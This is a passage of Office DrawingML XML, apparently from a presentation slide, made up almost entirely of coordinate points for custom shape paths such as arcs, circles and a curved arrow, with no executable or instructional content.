                    <a:pt x="2706831" y="2643803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736988" y="2610974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766214" y="2577296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794488" y="2542788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821789" y="2507472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848097" y="2471367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873392" y="2434495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897652" y="2396876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920858" y="2358531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942989" y="2319479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2964025" y="2279742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2983944" y="2239339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3002727" y="2198292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3020352" y="2156621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3036801" y="2114347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3052051" y="2071489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066082" y="2028069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078875" y="1984106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090408" y="1939622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100660" y="1894637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109613" y="1849172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117244" y="1803246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123534" y="1756881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128462" y="1710096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132007" y="1662913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134149" y="1615352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134868" y="1567434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134149" y="1519515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132007" y="1471954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128462" y="1424771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123534" y="1377986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117244" y="1331621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109613" y="1285695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100660" y="1240230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090408" y="1195245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078875" y="1150761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066082" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3052051" y="1063378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3036801" y="1020520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3020352" y="978246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3002727" y="936575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2983944" y="895528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2964025" y="855125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942989" y="815388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920858" y="776336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897652" y="737991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873392" y="700372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848097" y="663500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821789" y="627395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794488" y="592079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766214" y="557571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736988" y="523893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706831" y="491064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675763" y="459105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643803" y="428036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610974" y="397879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577296" y="368653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542788" y="340379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507472" y="313078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471367" y="286770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434495" y="261475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396876" y="237215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358531" y="214009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319479" y="191878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279742" y="170842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239339" y="150923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198292" y="132140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156621" y="114515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114347" y="98066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071489" y="82816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028069" y="68785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984106" y="55992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939622" y="44459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894637" y="34207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849172" y="25254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803246" y="17623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756881" y="11333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710096" y="6405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662913" y="2860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615352" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567433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508757" y="3375152"/>
              <a:ext cx="2290445" cy="4552315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2667" y="4482211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="4551718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73660" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142901" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142901" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74422" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142901" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184404" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295656" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824865" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924179" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021207" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115695" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382141" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464818" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544320" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620393" y="727456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692909" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761617" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826641" y="965708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887728" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997456" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045716" y="1326642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089531" y="1423670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192655" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236343" y="1942592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258695" y="2163445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258695" y="2388870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236343" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192655" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089531" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045716" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997456" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944878" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887982" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826895" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761997" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693291" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544828" y="3896360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465453" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208278" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116711" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724408" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620522" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514731" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407035" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297434" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186309" y="4463161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142901" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="4491609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300990" y="4482846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521081" y="4448937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628396" y="4424172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733552" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035304" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130934" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223771" y="4172331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313561" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400429" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484121" y="3986784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714881" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850136" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911984" y="3515360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969643" y="3425317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022856" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190622" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220468" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245233" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278761" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287270" y="2389505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287270" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278634" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264410" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190369" y="1615694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155444" y="1512570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071243" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968754" y="1125093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849120" y="948055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783207" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640078" y="706755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311656" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033018" y="275717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833882" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730885" y="156845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518160" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408940" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297815" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185166" y="59944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="73152" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69596" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73152" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="71755" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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509010" y="357454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75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509010" y="357454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509010" y="7279386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599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199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599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509010" y="7279386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599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599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199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599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418838" y="4656582"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="229362" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22936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418838" y="4656582"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="0" y="228600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
